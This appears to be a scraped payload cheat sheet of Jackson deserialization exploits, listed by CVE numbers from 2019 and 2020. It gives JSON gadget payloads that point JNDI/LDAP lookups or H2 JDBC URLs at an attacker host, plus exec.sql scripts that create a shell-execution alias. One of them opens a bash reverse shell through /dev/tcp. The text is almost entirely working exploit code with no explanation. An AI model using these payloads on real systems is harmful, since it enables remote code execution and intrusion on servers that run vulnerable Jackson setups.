CVE-2019-12384

SSRF

1
{"ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:tcp://IP/"}}

RCE

poc

1
{"ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://IP/exp.sql'"}}

exec.sql

1
2
3
4
5
6
7
8
9
CREATE ALIAS SHELLEXEC AS $ String shellexec(String cmd) throws
java.io.IOException {
   String[] command = {"bash", "-c", cmd};
   java.util.Scanner s = new
java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimi
ter("\\A");
   return s.hasNext() ? s.next() : ""; }
$;
CALL SHELLEXEC('bash -i >& /dev/tcp/地址/端口 0>&1')

CVE-2020-8840

1
{"org.apache.xbean.propertyeditor.JndiConverter", {"asText":"ldap://IP/e"}}

CVE-2020-9548

1
{"br.com.anteros.dbcp.AnterosDBCPConfig",{"metricRegistry":"ldap://IP/e"}}

CVE-2020-24616

1
{"br.com.anteros.dbcp.AnterosDBCPDataSource",{"metricRegistry":"ldap://IP/e"}}

CVE-2020-35728

1
{"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool",{"jndiPath":"ldap://IP/e"}}

CVE-2020-36179

poc

1
{"org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS","url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://IP/exec.sql'"}

exec.sql

1
2
3
4
5
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('calc.exe')

CVE-2020-36186

1
["org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource",{"dataSourceName":"ldap://IP/E"}]